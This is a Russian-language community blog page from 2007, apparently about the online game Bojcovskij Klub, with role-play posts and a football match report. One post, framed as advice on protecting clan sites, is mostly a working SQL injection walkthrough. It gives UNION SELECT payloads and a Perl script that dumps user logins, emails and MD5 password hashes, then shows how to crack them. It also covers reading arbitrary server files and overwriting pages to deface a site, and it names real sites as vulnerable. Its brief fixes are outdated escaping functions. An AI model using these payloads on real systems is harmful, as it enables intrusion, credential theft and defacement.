|
24.07.07 04:45 |
Nomen Illi Mors | Тьма идет! |
ru |
В целом, реакция БК на мое заявление оказалась вполне предсказуемой. Разумеется, так называемая БКшная общественность еще не доросла до ознания происходящих здесь глубинных политико-религиозных процессов. Что, в прочем, зная уровень интеллекта среднестатистического участника проекта абсолютно не удивительно. Тем самым хуже для них. Они окажуться неготовы к моему приходу к власти.
Nomen illi Mors.
Темный Властелин.
|
Comments: 3 | |
|
|
|
23.07.07 13:32 |
Nomen Illi Mors | Трепещите, враги Тьмы! |
ru |
Склоните колени перед Истинным Патриархом Тьмы!
Кучка предателей, и их трусливые преспешники уже скоро будут повержены и уничтожены.
Орден Света будеть гореть в Аду.
Di Abolo, я вырву твое сердце, во славу Бога нашего Мусорщика.
Тот, кто считает что Тьма это только склонность, абсолютно ничего в ней не понимает.
|
|
|
|
|
23.07.07 11:58 |
Nomen Illi Mors | Кандидат на должность Патриарха Тьмы |
ru |
Сейчас, в эти тяжелые для Бойцовского Клуба времена, сложилась ситуации, когда БК уже не может продолжать двигаться ошибочным курсом, и назревает необходимость кардинальных перемен. Обсолютно очевидно, что лучшим способом совершить эти перемены является назначение меня на должность Патриарха Тьмы.
Основные цели моего правления Тьмой это объединение всех протемных сил для подавления диктатуры ОС, взаимная легитимная прокачка боевых юнитов темных кланов, улучшение криминагенной ситуации в клубе.
Проведенный мной социологический опрос показал, что на данный момент электорат не чувствует доверия ни к одному из основных кандидатов на роль Патриарха Тьмы.
Таким образом, всем трезво, объективно и беспристрастно мыслящим участникам Бойцовского Клуба очевидно, что единственный человек, который может взять власть в свои руки - я. Что также подтверждает заявление Мусорщик [] 'а, где он ни сказал ни слова против моего назначения.
С моей кандидатурой так же в целом согласна и Армада, о чем она прямо заявила в своем "Откровении":
"Истинная первородная Тьма идет с Востока, возвращая себе половину мира, ибо фарисейство и сребролюбие светлых законников переполнили чашу терпения Темного Ангела. И настанет вскоре по всем землям плач и скрежет зубов."
Обращаюсь ко всем разумным темным, а так же к нейтралам и серым!
Единственная ваша надежда - Это Я!
Nomen illi Mors.
|
Comments: 22 | |
|
|
|
updated 15.04.08 00:13 16.07.07 22:46 |
NaiI | Историческая битва |
ru |
Игра: минифутбол 5 на 5 (4 + вратарь) два тайма по 25 минут.
Составы команд:
Свет:
BASMACH (c) (гк)
ANTUS
NaiI
Silver V
Вальтер
Кирт
Джек Тень
Тьма:
Pitt (c)
Берлускони (гк)
AWR
болт
Ростов Шпона
Лорд мертвяков
И еще парень, ник которого уточняется
Игра началась чуть позже, я встречал припозднившихся игроков. Темные выиграли жребий, разыграли мяч и началось то, чего я ждал 10 дней. После первых минут пяти появилось такое чувство, как будто дома бардак, а гости придут через минуту, ты мечешься и не знаешь, за что тебе хвататься. Еще бы, на 10-ой минуте счет был 4:0 в пользу Тьмы, такого начала я не ожидал, хотя нет, после того как впервые увидел некоторых соперников плохое предчувствие появилось.
Пас из глубины защиты, я убегаю правым флангом, бью в дальний нижний угол, 4:1. Зрители, преимущественно темные, приветствовали гол даже громче чем голы Тьмы, или мне так показалось. «Может еще получится», - подумал я… Но нет, первый тайм 7:1.
В перерыве кое-какую тактику разработали: я с 2-мя парнями в защите, ANTUS один впереди, я снабжаю его пасами, он забивает.
Поначалу схема работала, Антон забил 2 гола и подсократил разрыв, но затем мы пропустили еще штуки 3-4 и про схему забыли. Я с Антоном играл, не меняясь все 50 минут, естественно сил оставалось совсем мало. Спасибо нашему вратарю Игорю, без него счет бы стал вообще неприличным. Было горько смотреть, как соперники разыгрывают комбинации в нашей штрафной, но сил помочь чем-то у меня уже не было. После очередного прострела мяч от моей ноги влетел в наши ворота. Вот уж повеЗЛО.
Темные тоже подустали, пару раз отбирал мяч, прессингуя на чужой половине поля, но сил на то, чтобы этим мячом воспользоваться уже не хватало. Стал получаться и дриблинг, обыграв одного, или даже двух, я от бессилия дарил мяч третьему.
Ложкой меда в бочке дегтя стал 4-ый гол светлых, автором которого стал Джек Тень игравший в футбол впервые. Я получил мяч от вратаря BASMACH, и, неожиданно для себя, увидел открывающегося Пашку, рефлекторно отпасовав, я вывел его на рандеву с вратарем тьмы Берлускони. Джек буквально внес мяч в ворота вместе с вратарем и прибежавшим защитником, радости нашей команды не было предела, Джек и Вальтер буквально на руках друг друга носили :-)
В итоге сыгранная, более подготовленная и мастеровитая команды Тьмы переиграла нас со счетом 15:4.
Большое спасибо всем, кто пришел поиграть, поболеть и посудить ;)
Особенно хочу поблагодарить ребят из своей команды, которые разбивали в кровь ноги и разрывали одежду, но не опускали рук и бились до финального свистка.
Mood: влюбчивое  Music: Red hot chili peppers - Snow
|
Comments: 7 | |
|
|
|
17.06.07 12:02 |
Андомиэль | Вот я и большая стала :) |
ru |
Эх... Восьмой левел... Он мой! )))
Mood: романтичное  Music: treck 14
|
Comments: 7 | |
|
|
|
16.06.07 03:55 |
чиппи-гламур | защити себя сам |
ru |
Для примера использован сайт клана Cossacks Of Hell
В связи с последними событиями в БК , я решил провести исследования клансайтов ..
К сожалению , как оказалось , большая часть подвержена серьезным уязвимостям..Я хочу рассказать вам и сберечь вас от наиболее распространенных..
Как оказалось 80% просмотренных мною клансайтов имеют схожие уязвимости - сиквэл инъекции , что далеко не странно , тк у программистов не хватает больше ума как использовать стандартные проверки в скриптах при обращении к реляционной базе данных..Зачем думать головой , если можно содрать уже написанное ? =))
Зачастую , о наличии сиквэл инъекции могут сказать ошибки , явно указывающие, что произошла ошибка в sql запросе. В тоже время о наличии ошибки в сиквэл запросе можно судить и по косвенным признакам ..
Чтобы реализовать наш с вами взлом давайте найдем параметр , значения которого передаются в запросе к БД.. Это достаточно просто , как правило это может быть параметр для обращения к новостной ленте , галлерии , списку статей , панели регестрации итд ..
структура такого запроса
http://site/test.php?id=номер статьи или новости
естественно , любой нормальный человек , увидев такое в строке запроса или в сорсе кода начнет сУвать туда всякую херь =)
http://site/test.php?id=9999
http://site/test.php?id=ааа
http://site/test.php?id=0
http://site/test.php?id=-0
http://site/test.php?id=-1000
итд
в 10 сайтах , уже на этом этапе я получил ошибку , связанную с неверным сиквэл запросом
Некоторые программисты наивно полагают , что их спасет заключение параметра в одиночные ковычки - ' и ошибочная фильтрация символов.. бугага =)
что-нить типо
<?php
$param=preg_replace("/[a-zA-Z0-9]i","",$param);
?php>
---------------------------------------------------------------------------
если исследуя скрипт выше мы еще не получили ошибки , продолжим =))
http://site/test.php?id=-1'+/*
таким нехитрым маневром мы закрываем первую кавычку и ставим незакрытый сиквэл комментарий , который превращает следующий в запросе код в бесполезную информацию.
вуаля =))
*
Следует отметить , что вы можете и не получать вывод ошибочного запроса , но если в результате ковыряния параметра вы получаете редирект на главную страницу , или еще лучше страницу с пустым запросом или 500 ошибкой шттп - вы на верном пути и правильно выбрали атакуемый параметр ..
*
Дальше можно было бы и не писать ничего , если бы я не сомневался в профессионализме прогеров ..
далее начинаем подбирать верный запрос к таблице , туд , методом перебора выясняется номер столбца с выводом. Нам понадобится знать, в каком по счету столбце происходит вывод на страницу
http://site/test.php?id=-1'+union+select+null/*
если и такой запрос выдаст ошибку синтаксиса или пустую страницу , значит в скрипте, возможно имеется проверка на не пустоту одного из параметров ...
тогда идем конём ..
http://site/test.php?id=-1'+union+select+1/*
еееееее
http://site/test.php?id=-1'+union+select+1,2,3 итд/*
http://site/test.php?id=-1'+union+select+null,null,null,null,null,null,null/*
или если фильтруется пробуем
http://site/test.php?id=-1'+union+select+1,2,3,4,5,6,7/*
вуаля =))
Теперь можно перебирать имена таблиц .. Правильные запросы будут соответствовать существующим именам таблиц .. Наверно , интересно будет проверить на существование таблиц users , passwords , regusers и тд и тп ..
Если выводиться только одна строка из запроса (например , вместо тела статьи) , то можно передвигаться по строкам путем limit ..
http://site/test.php?id=-1'+union+select+1,concat(username,char(58),user_email,char(58),user_password),3,4,5,6,7+from+phpbb_users+limit+1,1/*
вуаля =))
*отдельно стоит рассказать про сиквэл функцию char() .. в качестве аргумента она принимает десятичный код ASCII символа , это нужно в том случае , когда скриптом фильтруются нужные символы...
например char(47) вернет нам / , когда если бы мы отослали его напрямую этот символ бы отфильтровался ..
*
Итак - мы имеем пароли в мд5 , логины и почтовые ящики пользователей .. (n делить на два , потом n деленное на два разделить на два итд)
Методом мат. анализа определяем , что записей в phpbb_forum тут 489 .. Анализируем сорс ошибки..
и пишем несложный скрипт на перле
не люблю я пхп =))
#!/usr/bin/perl -w
use LWP;
use strict;
my $ua=LWP::UserAgent->new;
my $i;
my $res;
$path='путь к уязвимости=-1\'+union+select+1,concat(username,char(58),user_email,char(58),user_password),3,4,5,6,7+from+phpbb_users+limit';
for ($i=1;$i<=488;$i++) {
my $res=$ua->request(HTTP::Request->new(GET=>$path.'+'."$i".',1/*'));
if ($res->is_success) {
$res->content=~/<center>Запрещено просматривать статью '(.*):(.*):(.*)'/;
open (LOG,">>list") || die " cant open file";
print LOG $1.':'.$2.':'.$3."\n";
close LOG;
} else {
print $res->status_line;
}
}
В кратце - используем модуль лвл для последовательного гет запроса ко всем строкам таблицы , выделяем из сорса нужные тэги , а из них в свою очередь - логины , пароли и мэйлы ..
вуаля =))
в фале list , в одной корневой со скриптом через 2 мин у нас вся база данных сайта =))
кидаем пароли клана на подбор в любую утилиту для штурма мд5
и вуаля , через минуту у нас уже пасс от одного соклана ..
а еще через два дня , от половины
но какого же будет ваше удивление , когда в ответ на инъекцию
http://site/test.php?id=-1'+union+select+1,LOAD_FILE(''),3,4,5,6,7/*
вы получите
сайтик то , на винде стоит , а это увеличивает полет фантазии вдвое
нам на самом деле и не нужны пароли , их можно и не качать ..
Достаточно написать что - нить типа
http://site/test.php?id=-1'+union+select+1,LOAD_FILE('путь к любому файлу на диске C:\'),3,4,5,6,7/*
для просмотра любого скрипта
и
http://site/test.php?id=-1'+union+select+1,'',2,3,4,5,6,7+from+phpbb_forum+into+outfile+'C:\usr\local\site\www\index.php'/*
для дефейса .. те подмены главной страницы .. да и вообще стереть любой файл можно ..
или закачать свое ..
Похожие уязвимости я нашел почти на всех топ клан сайтах ..
Даркклан , рмиб и пачке других..
Попытаться исправить это можно путем
- для целых и дробных величин , перед их использованием в запросе надо привести величину к нужному типу ..
$id=(int)$id; $total=(float)$total;
Вместо этого можно вставить систему слежения за тестированием на сиквэл инъекцию ..
if((string)$id<>(string)(int)$id) {
// пишем в лог о попытке ..
die('ops');
}
- для строковых параметров , которые не используются в like , regexp и тд , экранируем кавычки ..
$str=addslashes($str);
или , лучше я всегда советовал
mysql_escape_string($str)
- в строках , которые предполагается использовать внутри like , regexp и тд , необходимо так же заэкранировать специальные символы , применяющиеся в этих операторах , если это необходимо.. В противном случае , можно задокументировать использование этих символов ..
На прощание хочу сказать - никогда не ждите благодарностей от людей..
удачи , и помните - если жизнь свернула вас как удав , терпите =)))
hacked by 4
hacked by RaD
отдельное спасибо Diogen-у
|
Comments: 19 | |
|
|
Total posts: 199 Pages: 20
1.. 9 10 11 12 13 14 15 16 17 18 19 20
|
|
Mo |
Tu |
We |
Th |
Fr |
Sa |
Su |
| | | | | | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | | | | | | |
|